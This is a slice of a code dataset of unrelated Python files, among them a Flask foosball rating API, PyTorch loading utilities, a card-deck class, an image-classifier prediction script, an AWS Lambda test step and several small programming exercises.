rng=rng)","sub_path":"JSMA.py","file_name":"JSMA.py","file_ext":"py","file_size_in_byte":4209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"630358103","text":"from flask import Flask, render_template\nfrom flask_restful import Resource, Api, reqparse, inputs\nfrom flask_cors import CORS\nfrom sqlalchemy import create_engine, select\nfrom sqlalchemy import Table, Column, Integer, String, MetaData\nimport operator\nimport sys\n\n# Create a engine for connecting to SQLite3.\ndb = create_engine('sqlite:///fussball.db')\n\nmetadata = MetaData()\nplayers = Table('players', metadata,\n Column('name', String),\n Column('rating', Integer),\n )\n\nmatches = Table('matches', metadata,\n Column('a_off', String),\n Column('a_def', String),\n Column('a_score', Integer),\n Column('b_off', String),\n Column('b_def', String),\n Column('b_score', Integer),\n )\n\nmetadata.create_all(db)\n\napp = Flask(__name__)\napp.config['BUNDLE_ERRORS'] = True\napi = Api(app)\nCORS(app)\n\n\nclass Matches(Resource):\n def get(self):\n conn = db.connect()\n s = select([matches])\n result = conn.execute(s)\n return {'matches': [dict(row) for row in result]}\n\n name_options = {\n 'type': inputs.regex('^.+$'),\n 'help': \"Must not be empty\",\n 'required': True,\n 'nullable': False\n }\n\n score_options = {\n 'type': inputs.int_range(0, 10),\n 'required': True,\n 'nullable': False\n }\n\n post_parser = reqparse.RequestParser()\n post_parser.add_argument('a_off', **name_options)\n post_parser.add_argument('a_def', **name_options)\n post_parser.add_argument('a_score', **score_options)\n post_parser.add_argument('b_off', **name_options)\n post_parser.add_argument('b_def', **name_options)\n post_parser.add_argument('b_score', **score_options)\n\n def post(self):\n conn = db.connect()\n args = self.post_parser.parse_args()\n ins = matches.insert().values(**args)\n result = conn.execute(ins)\n return {'result': dict(result)}\n\n\nclass Ratings(Resource):\n def rating(self, player):\n try:\n return self.ratings[player]\n except KeyError:\n self.ratings[player] = 1200\n return self.ratings[player]\n\n def tag(self, player_name):\n name_tag = \"{} ({})\"\n return name_tag.format(player_name, self.ratings[player_name])\n\n def get(self):\n conn = db.connect()\n s = select([matches])\n result = conn.execute(s)\n\n self.ratings = {}\n\n for match in result:\n a_off = match['a_off']\n a_def = match['a_def']\n a_score = match['a_score']\n b_off = match['b_off']\n b_def = match['b_def']\n b_score = match['b_score']\n\n team_a = self.rating(a_off) + self.rating(a_def)\n team_b = self.rating(b_off) + self.rating(b_def)\n\n e_a = 1 / (1 + 10 ** ((team_b - team_a)/400.0))\n e_b = 1 / (1 + 10 ** ((team_a - team_b)/400.0))\n\n r_a = a_score / float(a_score + b_score)\n r_b = b_score / float(a_score + b_score)\n\n diff_a = int(round(32 * (r_a - e_a)))\n diff_b = int(round(32 * (r_b - e_b)))\n\n team_tag = \"{} & {}\"\n team_a_tag = team_tag.format(self.tag(a_off), self.tag(a_def))\n team_b_tag = team_tag.format(self.tag(b_off), self.tag(b_def))\n print(\"{} vs {}\".format(team_a_tag, team_b_tag))\n print(\"Chance to win: {} vs {}\".format(e_a, e_b))\n print(\"Actual result: {}-{}\".format(a_score, b_score))\n print(\"Actual distribution: {} vs {}\".format(r_a, r_b))\n print(\"Adjusting {} and {}\".format(diff_a, diff_b))\n\n self.ratings[a_off] += diff_a\n self.ratings[a_def] += diff_a\n self.ratings[b_off] += diff_b\n self.ratings[b_def] += diff_b\n\n new_ratings_tags = [\n self.tag(a_off),\n self.tag(a_def),\n self.tag(b_off),\n self.tag(b_def),\n ]\n print(\"New Ratings: {}, {}, {}, {}.\".format(*new_ratings_tags))\n\n return self.ratings\n\n\napi.add_resource(Matches, '/matches')\napi.add_resource(Ratings, '/ratings')\n\n\n@app.route(\"/\")\ndef home():\n r = Ratings()\n ratings = r.get()\n\n items = ratings.items()\n key = operator.itemgetter(1)\n sorted_ratings = sorted(items, key=key, reverse=True)\n\n return render_template('home.html', ratings=sorted_ratings)\n\n\nif __name__ == '__main__':\n app.run(debug=True, host=\"0.0.0.0\", port=int(sys.argv[1]))\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"419753","text":"from enum import Enum, unique\n\nfrom greensim import now, advance\n\nfrom itsim.machine import Node\nfrom itsim.machine.file_system import File\nfrom itsim.machine.file_system.access_policies import Policy, TargetedPolicy\nfrom itsim.machine.process_management.thread import Thread\nfrom itsim.machine.user_management import UserAccount, UserGroup\nfrom itsim.simulator import Simulator\n\nfrom typing import Callable\n\n\n@unique\nclass Colors(Enum):\n RED = '\\033[31m'\n GREEN = '\\033[32m'\n YELLOW = '\\033[33m'\n CLOSE = '\\033[0m'\n\n\ndef log(msg: str, color: Colors = None) -> None:\n if color is not None:\n msg = color.value + msg + Colors.CLOSE.value\n print(msg)\n\n\ndef run_sample() -> None:\n sim = Simulator()\n\n # Simple output for the child processes\n def short_kid(t: Thread):\n advance(10)\n log(\"I'm a child process! #%s > #%s\" % (t._process._parent._n, t._process._n), Colors.YELLOW)\n\n def ping(thread: Thread) -> None:\n proc = thread._process\n log(\"Howdy. It's %s O'clock\" % now())\n log(\"\\t I'm in process number %s\" % proc._n)\n if proc._parent is not None:\n log(\"\\t\\t I'm a proud descendant of process %s\" % proc._parent._n)\n log(\"\\t\\t I'm in thread number %s\" % thread._n)\n\n # Show off forking from withing a process\n proc.fork_exec(sim, short_kid)\n\n # This just fills the function set in the Thread object to show that it works and how it looks\n thread.clone(lambda _: advance(1))\n thread.clone(lambda _: advance(1))\n\n # Builder patter for a priori setup of functions running at specific times\n pm = Node().with_proc_at(sim, 1, ping)\n\n # Setting up a new process, forking it from outside, and setting up some concurrent threads\n proc = pm.fork_exec(sim, ping)\n kid = proc.fork_exec(sim, ping)\n kid.exc_in(sim, 1, ping)\n kid.exc_in(sim, 2, ping)\n kid.exc_in(sim, 3, ping)\n\n user: UserAccount = UserAccount(\"demo\")\n group: UserGroup = UserGroup(\"demo\")\n group.add_members(user)\n\n default_policy = TargetedPolicy(False, False, False)\n user_policy = TargetedPolicy(False, False, True)\n group_policy = TargetedPolicy(False, False, True)\n\n user_allowed: Policy = Policy(default_policy, user_rules={user: user_policy})\n group_allowed: Policy = Policy(default_policy, group_rules={group: group_policy})\n runnable_a: File[Callable[[Thread], None]] = File(ping, user_allowed)\n runnable_b: File[Callable[[Thread], None]] = File(ping, group_allowed)\n pm.run_file(sim, runnable_a, user)\n pm.run_file(sim, runnable_b, user)\n sim.run()\n\n\nif __name__ == '__main__':\n run_sample()\n","sub_path":"examples/design/node_structure/simple_processes.py","file_name":"simple_processes.py","file_ext":"py","file_size_in_byte":2655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"425292255","text":"old_row = []\n# asks user to enter the desired height of the pascal triangle\nheight = int(input(\"Enter the desired height of Pascal's triangle\"))\nx=1\nnew_row = []\nmaster_list = []\n# function to create new row of pascal triangle\n\n\ndef make_new_row(old_row):\n new_row = []\n i=0\n row1 = []\n row2 = [1]\n length = len(old_row)\n\n if old_row == row1:\n old_row.append(1)\n master_list.append(row2)\n return old_row\n if old_row == row2:\n old_row.append(1)\n return old_row\n # appends first element of the old_row to the first element of the new row\n new_row.append(old_row[i])\n # uses length of old_row to determine how many appends are required to create new row\n while i < length-1:\n new_row.append(old_row[i]+ old_row[i+1])\n i += 1\n # appends last element of original row to last element of the new row\n new_row.append(old_row[length - 1])\n old_row = new_row\n # appends old row to master_list each iteration of the while loop below\n master_list.append(old_row)\n return old_row\n\n# calls function make_new_row until specified height has been reached\n\n\nprint(\"Printing lists one list at a time\")\n\n\nwhile x < height:\n row1 = []\n row2 = [1]\n if old_row == row1:\n old_row = make_new_row(old_row)\n master_list.append(old_row)\n print(old_row)\n\n old_row = make_new_row(old_row)\n\n print(old_row)\n\n x += 1\nprint(\"Printing whole lists of lists\")\nprint(master_list)\n\n","sub_path":"exam.py","file_name":"exam.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"366429497","text":"import torch\nfrom torchvision import datasets, transforms\nimport torch.optim as optim\nfrom models import models\nfrom configs import DatasetEnum, get_class_count\nfrom models.wide_resnet_28_10 import wide_resnet\n\n\ndef load_check_point(path, model, optimizer):\n global start_epoch\n checkpoint = torch.load(path)\n model.load_state_dict(checkpoint['net'])\n optimizer.load_state_dict(checkpoint['optimizer_state_dict'])\n\n start_epoch = checkpoint['epoch']+1\n model.eval()\n return model, optimizer, start_epoch\n\ndef init(dataset, lr, use_cuda=True):\n normalize_layer = models.NormalizationLayer(dataset)\n num_classes = get_class_count(dataset)\n\n if dataset == DatasetEnum.MNIST:\n model = models.MNISTModel(num_classes)\n optimizer = optim.Adam(model.parameters(), lr=lr)\n elif dataset == DatasetEnum.SVHN:\n lr = 0.002\n model = models.ResNet18(num_classes)\n optimizer = optim.Adam(model.parameters(), lr=lr)\n elif dataset == DatasetEnum.CIFAR10:\n lr = 0.02\n model = wide_resnet(num_classes)\n optimizer = optim.SGD(model.parameters(), lr, momentum=0.9, weight_decay=5e-4)\n\n if use_cuda:\n model = torch.nn.DataParallel(model).cuda()\n model = torch.nn.Sequential(normalize_layer, model)\n return model, optimizer\n\ndef only_test(dataset, batch_size):\n trans = transforms.Compose([transforms.ToTensor()])\n if dataset == DatasetEnum.MNIST:\n test_loader = torch.utils.data.DataLoader(datasets.MNIST('./data', train=False, transform=trans),\n batch_size=batch_size, shuffle=False)\n elif dataset == DatasetEnum.CIFAR10:\n test_loader = torch.utils.data.DataLoader(datasets.CIFAR10('./data/CIFAR10', train=False, transform=trans),\n batch_size=batch_size, shuffle=False)\n elif dataset == DatasetEnum.SVHN:\n test_loader = torch.utils.data.DataLoader(\n datasets.SVHN('./data/SVHN', split='test', transform=trans, download=True),\n batch_size=batch_size, shuffle=False)\n return test_loader","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"106338045","text":"# 练习:定义敌人类(姓名,攻击力10 -- 50,血量100 -- 200)\n# 创建一个敌人对象,可以修改数据,读取数据。\n# 使用@property封装变量\n\nclass Enemy:\n def __init__(self, name, hp, atk):\n self.name = name\n self.atk = atk\n self.hp = hp\n\n @property\n def atk(self):\n return self.__atk\n\n @atk.setter\n def atk(self, value):\n if 10 <= value <= 50:\n self.__atk = value\n else:\n raise ValueError(\"我不要\")\n\n @property\n def hp(self):\n return self.__hp\n\n @hp.setter\n def hp(self, value):\n if 100 <= value <= 200:\n self.__hp = value\n else:\n raise ValueError(\"我不要\")\n\n\ne01 = Enemy(\"灭霸\", 100, 25)\ne01.hp = 150\ne01.atk = 30\nprint(e01.hp)\nprint(e01.__dict__)\n","sub_path":"python_one_learn/day11/exercise03.py","file_name":"exercise03.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"192650719","text":"from keras import models\r\nfrom keras.models import model_from_json\r\nfrom keras.preprocessing.image import load_img,img_to_array,array_to_img\r\nimport numpy as np\r\nfrom PIL import Image\r\nimport os\r\n\r\n#モデルの読み込み\r\nmodel = model_from_json(open('model/chara_predict.json').read())\r\n\r\n#重みの読み込み\r\nmodel.load_weights(\"weight/chara_predict.hdf5\")\r\n#model.summary()\r\n\r\n#モデルのコンパイル\r\nfrom keras import optimizers\r\n\r\nmodel.compile(loss = \"binary_crossentropy\",\r\n optimizer=optimizers.RMSprop(lr=1e-3),\r\n metrics=[\"acc\"])\r\n\r\n\r\ncategories = [\"舞菜\",\"紗由\",\"かえ\",\"香澄\",\"瑞葉\",\"みい\",\r\n\"紫\",\"陽花\",\r\n\"碧音\",\"瑠夏\",\"珊瑚\",\r\n\"天葉\",\"奏\",\"那岐咲\",\r\n\"美久龍\",\"朱莉\",\"玄刃\",\"ハク\"]\r\n\r\n#認識したい画像の読み込み\r\nimg_name = os.listdir(\"検証データ\")\r\n\r\nfor j in range(len(img_name)):\r\n #img = load_img(\"検証データ/\"+str(j)+\".jpg\",target_size=(80,80,3))\r\n img = load_img(\"検証データ/\"+img_name[j],target_size=(80,80,3))\r\n x = img_to_array(img)/255\r\n x = np.expand_dims(x, axis=0)\r\n#予測\r\n features = model.predict(x)\r\n temp = np.zeros(18)\r\n for i in range(0,18):\r\n temp[i] = features[0,i]\r\n sortfea = sorted(temp, reverse=True)\r\n#予測の結果から処理を分ける\r\n for i in range(0,18):\r\n if features[0,i]== sortfea[0]:\r\n cat = categories[i]\r\n print(img_name[j]+\"は「\"+categories[i]+\"]と認識されました(認識率[%]=\", end='')\r\n print(np.array(sortfea[0]*100,dtype=int))\r\n \r\n for i in range(0,18):\r\n if features[0,i]== sortfea[1]:\r\n cat = categories[i]\r\n print(\"もし違うのであれば「\"+categories[i]+\"]ですか?(認識率[%]=\", end='')\r\n print(np.array(sortfea[1]*100,dtype=int))\r\n\r\n for i in range(0,18):\r\n if features[0,i]== sortfea[2]:\r\n cat = categories[i]\r\n print(\"それでも違うのであれば「\"+categories[i]+\"]ですか?(認識率[%]=\", end='')\r\n print(np.array(sortfea[2]*100,dtype=int))\r\n\r\n print(\" \")\r\n\r\n ","sub_path":"recognition.py","file_name":"recognition.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"503005720","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Sep 9 09:05:25 2016\n\n@author: lmcfadden\n\"\"\"\n\nvow = 'aeiou'\ns = 'azcbobobegghakl'\ncnt = 0\n\nfor i in range(len(s)):\n if s[i] in vow:\n cnt += 1\n \nprint (cnt)","sub_path":"Python_2016/PS1_1.py","file_name":"PS1_1.py","file_ext":"py","file_size_in_byte":215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"10242091","text":"# -*- coding: utf-8 -*-\n# -*- author: jokker -*-\n\n\"\"\"\n常用到的一些零碎,未能整理的内容整理\n\"\"\"\n\nimport heapq\nfrom collections import OrderedDict\nfrom collections import Counter\nfrom operator import itemgetter\nfrom itertools import groupby\nimport random\nfrom itertools import dropwhile\nfrom itertools import islice\nfrom itertools import permutations\nfrom itertools import chain\n\n\nclass AssistUtil(object):\n\n def __init__(self):\n self.date = 123\n\n @staticmethod\n def find_nlargest_nsmallest(find_num, data, func=None, find_nlargest=True):\n \"\"\"找到最大或者最好的几个元素\"\"\"\n if find_nlargest:\n return heapq.nlargest(find_num, data, key=func)\n else:\n return heapq.nsmallest(find_num, data, key=func)\n\n # use_example\n # a = {'a': 12, 'b': 24, 'c': 3}\n # b = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]\n # print AssistUtil.find_nlargest_nsmallest(2, a.values(), None)\n # print AssistUtil.find_nlargest_nsmallest(2, b, lambda x: x[1], False)\n\n @staticmethod\n def get_order_dict():\n \"\"\"获得有序字典\"\"\"\n # TODO 书上说可以在生成xml的时候让字段变得有序,可以试一下\n return OrderedDict()\n\n @staticmethod\n def most_common(data, need_num=None):\n \"\"\"找出序列中出现次数最多的元素,输入 list,返回值,第一个是元素值,第二个是元素个数\"\"\"\n counter = Counter(data)\n if need_num is None:\n return counter.most_common()\n else:\n return counter.most_common(need_num)\n\n # # use example\n # c = [1, 2, 3, 3, 2, 4, 5, 5, 6, 6, 332, 2, 22, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3]\n # print AssistUtil.most_common(c, 2)\n\n @staticmethod\n def sort_list_dict(assign_dict, assign_key):\n \"\"\"使用公共键对字典列表进行排序\"\"\"\n return sorted(assign_dict, key=itemgetter(assign_key))\n\n # # use example\n # d = [{'a': 1}, {'a': 12}, {'a': 34}, {'a': 2}]\n # print AssistUtil.sort_list_dict(d, 'a')\n\n @staticmethod\n def group_by(assign_data, assign_key):\n \"\"\"根据字典将字段分组\"\"\"\n assign_data.sort(key=itemgetter(assign_key))\n return groupby(assign_data, key=itemgetter(assign_key))\n\n # # use example\n # e = [\n # {'a':'1', 'b':1323},\n # {'a':'2', 'b':1243},\n # {'a':'1', 'b':123},\n # {'a':'2', 'b':125343},\n # {'a':'3', 'b':1236},\n # {'a':'2', 'b':1223},\n # {'a':'3', 'b':12354},\n # ]\n # for a, each in AssistUtil.group_by(e, 'a'):\n # print a\n # for i in each:\n # print\n\n # ------------------------ other ---------------------------------\n @staticmethod\n def reversed(data):\n \"\"\"反序, 可以用于序列的反向输出\"\"\"\n return reversed(data)\n\n # 迭代排列组合\n @staticmethod\n def permutations(data, assign_num=None):\n \"\"\"排列组合, 可以指定一次提取的个数\"\"\"\n for p in permutations(data, assign_num):\n print(p)\n\n\n# 跳过可迭代对象的前一部分元素\ndef dropwhile():\n \"\"\"跳过指定的一些行\"\"\"\n with open(r'', 'r') as f:\n for line in dropwhile(lambda x: x.startswith('#'), f):\n print(line)\n\n\n# 知道要跳过多少元素\ndef islice():\n \"\"\"知道要跳过多少行,跳过他们\"\"\"\n items = [1, 2, 3, 4, 5, 6, 7]\n # 输出除乐前三个元素之外的所有元素\n for x in islice(items, 3, None):\n print(x)\n\n\n# 对多个序列进行迭代\ndef chain(data):\n \"\"\"对多个序列进行迭代,可以使用 chain 将多个序列锁起来\"\"\"\n for i in chain([1, 2, 3], {4, 5, 6}, (7, 8, 9)):\n print(i)\n\n\nif __name__ == '__main__':\n\n a = {'a': 12, 'b': 24, 'c': 3}\n\n b = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]\n\n c = [1, 2, 3, 3, 2, 4, 5, 5, 6, 6, 332, 2, 22, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3]\n\n # c = ['1','2','3','4','1']\n\n d = [{'a': 1}, {'a': 12}, {'a': 34}, {'a': 2}]\n\n e = [\n {'a': '1', 'b': 1323},\n {'a': '2', 'b': 1243},\n {'a': '1', 'b': 123},\n {'a': '2', 'b': 125343},\n {'a': '3', 'b': 1236},\n {'a': '2', 'b': 1223},\n {'a': '3', 'b': 12354},\n ]\n\n print(AssistUtil.find_nlargest_nsmallest(2, a.values(), None))\n print(AssistUtil.find_nlargest_nsmallest(2, b, lambda x: x[1], False))\n\n print(AssistUtil.most_common(c, 2))\n\n for a, each in AssistUtil.group_by(e, 'a'):\n print(a)\n for i in each:\n print(i)\n","sub_path":"Assist/AssistUtil.py","file_name":"AssistUtil.py","file_ext":"py","file_size_in_byte":4650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"462453484","text":"import json\nimport boto3\nimport datetime\n\n### Step in the testing framework's step function to update end timestamp and\n### move the testing to the next test.\n\nsession = boto3.Session(region_name = 'us-west-2')\ns3 = session.resource(\"s3\")\nddb = session.client(\"dynamodb\")\n\nCONFIG_TABLE = 'datalake-test-config'\n\ndef lambda_handler(event, context):\n \n testid = event.get('test_id')\n print(\"testid:\" + str(testid))\n if None == testid:\n testid = '0'\n else:\n first_item = ddb.scan( TableName=CONFIG_TABLE,\n ScanFilter = {\n 'test_id' : {'AttributeValueList':[{'S':testid}],\n 'ComparisonOperator':'EQ'}\n }\n )\n \n if None == first_item or 0 >= len(first_item.get('Items')):\n print(\"No test found\")\n else:\n is_active = item.get('active').get('N')\n ## Update endedAt only if test was active\n if( \"1\" == str(is_active)):\n item = first_item.get('Items')[0]\n item['endedAt'] = {'S':str(datetime.datetime.now())}\n ddb.put_item(TableName=CONFIG_TABLE, Item=item)\n\n ## Increment to next test.\n testid = str(int(testid) + 1)\n rt = {\"test_id\": testid}\n \n return rt\n","sub_path":"sdlf-utils/pipeline-testing/src/lambdas/nextTest.py","file_name":"nextTest.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"231940801","text":"# Create a Deck of Cards, Ben Cillie, 11/1/18\nimport random\n\nsuits = ['s','c','h','d']\nranks = [1,2,3,4,5,6,7,8,9,10,11,12,13]\nclass Card:\n\tdef __init__(self, suit, rank):\n\t\tself.suit = suit\n\t\tself.rank = rank\n\n\tdef __str__(self):\n\t\tif self.rank == 1:\n\t\t\trank = \"Ace\"\n\t\telif self.rank == 11:\n\t\t\trank = \"Jack\"\n\t\telif self.rank == 12:\n\t\t\trank = \"Queen\"\n\t\telif self.rank == 13:\n\t\t\trank = \"King\"\n\t\telse:\n\t\t\trank = self.rank\n\t\tif self.suit == 'h':\n\t\t\tsuit = \"Hearts\"\n\t\telif self.suit == 'd':\n\t\t\tsuit = \"Diamond\"\n\t\telif self.suit == 'c':\n\t\t\tsuit = \"Clubs\"\n\t\telif self.suit == 's':\n\t\t\tsuit = \"Spades\"\n\t\treturn str(rank) + \" of \" + str(suit)\n\n\nclass Deck:\n\t# default: Start with a complete, 52 card deck\n\tdef __init__(self, default):\n\t\tself.default = default\n\t\tself.cards = []\n\t\tif self.default:\n\t\t\tfor suit in suits:\n\t\t\t\tfor rank in ranks:\n\t\t\t\t\tself.cards.append(Card(suit,rank))\n\n\t# rearragne the deck randomly\n\tdef shuffle(self):\n\t\trandom.shuffle(self.cards)\n\n\t# sort the deck by: suit or rank\n\tdef sort(self, method):\n\t\tcardz = []\n\t\tif method == \"suit\":\n\t\t\tfor suit in suits:\n\t\t\t\tprint(\"Suit is \" + suit)\n\t\t\t\tfor c in self.cards:\n\t\t\t\t\tif c.suit == suit:\n\t\t\t\t\t\tcardz.append(c)\n\t\t\tself.cards = cardz\n\t\telif method == \"rank\":\n\t\t\tcardz = []\n\t\t\tcardz.append(self.cards[0])\n\t\t\tfor c in self.cards[1:]:\n\t\t\t\ti = 1\n\t\t\t\tput = False\n\t\t\t\tfor cz in cardz:\n\t\t\t\t\tif c.rank <= cz.rank:\n\t\t\t\t\t\tcardz.insert(i-1, c)\n\t\t\t\t\t\tput = True\n\t\t\t\t\t\tbreak\n\t\t\t\t\ti += 1\n\t\t\t\tif not put:\n\t\t\t\t\tcardz.append(c)\n\t\t\tself.cards = cardz\n\n\t# \n\tdef draw(deck, method, count):\n\t\tif method == 'rand':\n\t\t\tfor i in range(count):\n\t\t\t\tpass\n\t\telif method == 'top':\n\t\t\tfor i in range(count):\n\t\t\t\tpass\n\n\t# Remove a card from the deck\n\t# card: type(int or Card)\n\t# type Card removes first instance of that card\n\tdef remove(self, card):\n\t\tif isinstance(card, int):\n\t\t\tif card < len(self.cards):\n\t\t\t\tdel self.cards[card]\n\t\telif isinstance(card, Card):\n\t\t\tfor c in self.cards:\n\t\t\t\ti = 0\n\t\t\t\tif c.suit == card.suit and c.rank == card.rank:\n\t\t\t\t\tdel self.cards[i]\n\t\t\t\ti += 1\n\n\n\tdef add(self, card, position=0):\n\t\tif position > len(self.cards):\n\t\t\tposition = 0\n\t\tself.cards.insert(position, card)\n\n\tdef __str__(self):\n\t\tcardz = \"\"\n\t\ti = 0\n\t\tfor c in self.cards:\n\t\t\tcardz += (str(c) + \"\\n\")\n\t\t\ti += 1\n\t\tprint(str(i))\n\t\treturn cardz\n\n\nd = Deck(True)\nd.shuffle()\nd.sort(\"rank\")\nprint(str(d))","sub_path":"cards.py","file_name":"cards.py","file_ext":"py","file_size_in_byte":2326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"77641446","text":"#\n# Copyright (C) 2011 - 2021 Satoru SATOH \n# SPDX-License-Identifier: MIT\n#\n# Suppress import positions after some global variables are defined\n# pylint: disable=wrong-import-position\n\"\"\"A collection of default backend modules.\n\"\"\"\nimport warnings\n\nfrom . import (\n ini,\n json,\n pickle,\n properties,\n shellvars,\n yaml,\n xml\n)\nfrom .base import (\n ParserT, ParsersT, ParserClssT\n)\n\n\nPARSERS: ParserClssT = [\n ini.Parser, pickle.Parser, properties.Parser, shellvars.Parser, xml.Parser\n] + json.PARSERS\n\n_NA_MSG = \"'{}' module is not available. Disabled {} support.\"\n\nif yaml.PARSERS:\n PARSERS.extend(yaml.PARSERS)\nelse:\n warnings.warn(_NA_MSG.format('yaml', 'YAML'), ImportWarning)\n\ntry:\n from . import toml\n PARSERS.append(toml.Parser)\nexcept ImportError:\n warnings.warn(_NA_MSG.format('toml', 'TOML'), ImportWarning)\n\n\n__all__ = [\n 'ParserT', 'ParsersT', 'ParserClssT',\n 'PARSERS',\n]\n\n# vim:sw=4:ts=4:et:\n","sub_path":"src/anyconfig/backend/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"124661381","text":"import glob\nimport json\n\n# modify the root to ModelNet40\nroot = \"./ModelNet40\"\n\nclses = []\n\n\ndef mk_model_net40():\n l = glob.glob(root+'/*')\n\n # save classes\n for x in l:\n clses.append(x.split('/')[-1])\n with open(\"./classes.txt\", 'w') as f:\n for i, x in enumerate(clses):\n f.write(str(i)+\":\\t\"+x+\"\\n\")\n\n # generate train single\n train_single_3d = []\n for i, path in enumerate(l):\n single_list = glob.glob(path+'/train/*')\n for single_path in single_list:\n train_single_3d.append([single_path, i])\n with open(\"train_single_3d.json\", 'w') as f:\n json.dump(train_single_3d, f)\n\n # generate test single\n test_single_3d = []\n for i, path in enumerate(l):\n single_list = glob.glob(path + '/test/*')\n for single_path in single_list:\n test_single_3d.append([single_path, i])\n with open(\"test_single_3d.json\", 'w') as f:\n json.dump(test_single_3d, f)\n\n # generate train multi\n # ./ModelNet40/xbox/train/xbox_0027.obj_whiteshaded_v0.png\n train_3d = []\n for i, path in enumerate(l):\n single_list = glob.glob(path + '/train/*')\n tmpl = []\n for single_path in single_list:\n tmpl.append(single_path.split(\"obj_whiteshaded\")[-2])\n tmpl = list(set(tmpl))\n tmpl = [[x, i] for x in tmpl]\n train_3d.extend(tmpl)\n with open(\"train_3d.json\", 'w') as f:\n json.dump(train_3d, f)\n\n # generate test multi\n # ./ModelNet40/xbox/train/xbox_0027.obj_whiteshaded_v0.png\n test_3d = []\n for i, path in enumerate(l):\n single_list = glob.glob(path + '/test/*')\n tmpl = []\n for single_path in single_list:\n tmpl.append(single_path.split(\"obj_whiteshaded\")[-2])\n tmpl = list(set(tmpl))\n tmpl = [[x, i] for x in tmpl]\n test_3d.extend(tmpl)\n with open(\"test_3d.json\", 'w') as f:\n json.dump(test_3d, f)\n\n\nif __name__ == '__main__':\n mk_model_net40()\n","sub_path":"data_process.py","file_name":"data_process.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"206887345","text":"import os\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n#Getting the files\nExternalFilesFolder=r\"C:\\Users\\Giulia\\Desktop\\Gitex\\python4ScientificComputing_Numpy_Pandas_MATPLotLIB\\ExternalFiles\"\nTemperatureFileName=\"Austin_weather_2014.csv\"\nIrradianceFileName=\"irradiance_2014_gen.csv\"\nConsumptionFileName=\"consumption_5545.csv\"\npath_ConsumptionFileName=os.path.join(ExternalFilesFolder,ConsumptionFileName)\npath_TemperatureFile=os.path.join(ExternalFilesFolder,TemperatureFileName)\npath_IrradianceFile=os.path.join(ExternalFilesFolder,IrradianceFileName)\n\n#Opening DataFrame of consumption and changing the index format\nDF_consumption=pd.read_csv(path_ConsumptionFileName,sep=\",\",index_col=0)\nPreviousIndex=DF_consumption.index\nNewParseIndex=pd.to_datetime(PreviousIndex)\nDF_consumption.index=NewParseIndex\nDF_consumption.index.dayofweek\n\n#Finding data for a specific period of time\nDF_consumption_somedaysinMay=DF_consumption[\"2014-05-15 00:00:00\":\"2014-05-30 23:00:00\"]\n\n#Finding weather data of the referred period\nDF_weather=pd.read_csv(path_TemperatureFile,sep=\";\",index_col=0)\npreviousIndex_weather=DF_weather.index\nNewIndex_weather=pd.to_datetime(previousIndex_weather)\nDF_weather.index=NewIndex_weather\n\n#a new data frame with a list as colomn\nDF_Temperature_somedaysinMay=DF_weather[[\"temperature\"]][\"2014-05-15 00:00:00\":\"2014-05-30 23:00:00\"]\n\n#temperature in Celsius\ndef celsius(row):\n FtoCelsius=(row-32)*5/9\n return FtoCelsius\nDF_Temperature_celsius=DF_Temperature_somedaysinMay.apply(celsius)\n\n#Reading the Irradiance file\nDF_IrradianceSource=pd.read_csv(path_IrradianceFile,sep=\";\",index_col=1)\nPreviousIndex=DF_IrradianceSource.index\nNewIndexIrradiance=pd.to_datetime(PreviousIndex)\nDF_IrradianceSource.index=NewIndexIrradiance\nDF_Irradiance_insomedaysinMay=DF_IrradianceSource[[\"gen\"]][\"2014-05-15 00:00:00\":\"2014-05-30 23:00:00\"]\n\nDF_Irradiance_insomedaysinMay[\"gen\"]<0\nDF_Irradiance_insomedaysinMay[\"gen\"][DF_Irradiance_insomedaysinMay[\"gen\"]<0]=0\n \n \n\nDF_joined=DF_consumption.join([DF_Temperature_celsius,DF_Irradiance_insomedaysinMay])\nDF_joined.head()\nDF_joined_cleaned=DF_joined.dropna()\nDF_joined_cleaned_insomedaysinMay=DF_joined_cleaned[\"2014-05-15 00:00:00\":\"2014-05-30 23:00:00\"]\n\nplt.subplot(3,1,1)\nplt.plot(DF_consumption_somedaysinMay)\nplt.xlabel(\"Time\")\nplt.ylabel(\"AC 